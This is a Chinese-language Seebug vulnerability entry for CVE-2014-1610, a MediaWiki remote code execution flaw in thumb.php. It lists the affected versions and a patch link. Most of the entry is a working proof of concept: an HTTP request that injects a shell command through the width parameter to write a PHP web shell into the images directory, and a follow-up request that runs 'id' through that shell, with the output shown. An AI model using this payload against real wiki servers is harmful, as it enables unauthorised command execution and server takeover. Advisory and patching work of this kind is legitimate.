Lucene search

RootSSV:61437

HistoryFeb 13, 2014 - 12:00 a.m.

MediaWiki远程代码执行漏洞

2014-02-1300:00:00

Root

www.seebug.org

220

0.083 Low

EPSS

Percentile

94.4%

JSON

CVE ID:CVE-2014-1610

MediaWiki是美国维基媒体（Wikimedia）基金会和MediaWiki志愿者共同开发维护的一套自由免费的基于网络的Wiki引擎，它可用于部署内部的知识管理和内容管理系统。

MediaWiki中存在输入验证漏洞，该漏洞源于thumb.php脚本没有正确过滤‘page’参数。当启用支持上传DjVu或PDF文件时，远程攻击者可借助特制的shell元字符利用该漏洞执行任意命令。以下版本受到影响：MediaWiki 1.22.2之前的1.22.x版本，1.21.5之前的1.21.x版本，1.19.11之前的1.19.x版本。
0
MediaWiki <= 1.22.1
MediaWiki <= 1.21.4
MediaWiki <= 1.19.10
厂商补丁：

MediaWiki

目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：

http://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html


                                                GET /mediawiki1221/thumb.php?f=longcat.pdf&amp;w=10|`echo%20%22%3C
php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`
HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;
my_wiki_session=op3h2huvddnmg7gji0pscfsg02
 
&lt;html&gt;&lt;head&gt;&lt;title&gt;Error generating thumbnail&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Error generating thumbnail&lt;/h1&gt;
&lt;p&gt;
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found&lt;br /&gt;
convert: option requires an argument `-resize' @
error/convert.c/ConvertImageCommand/2380.&lt;br /&gt;
GPL Ghostscript 9.10: Unrecoverable error, exit code 1&lt;br /&gt;
 
&lt;/p&gt;
 
&lt;/body&gt;
&lt;/html&gt;
 
 
GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)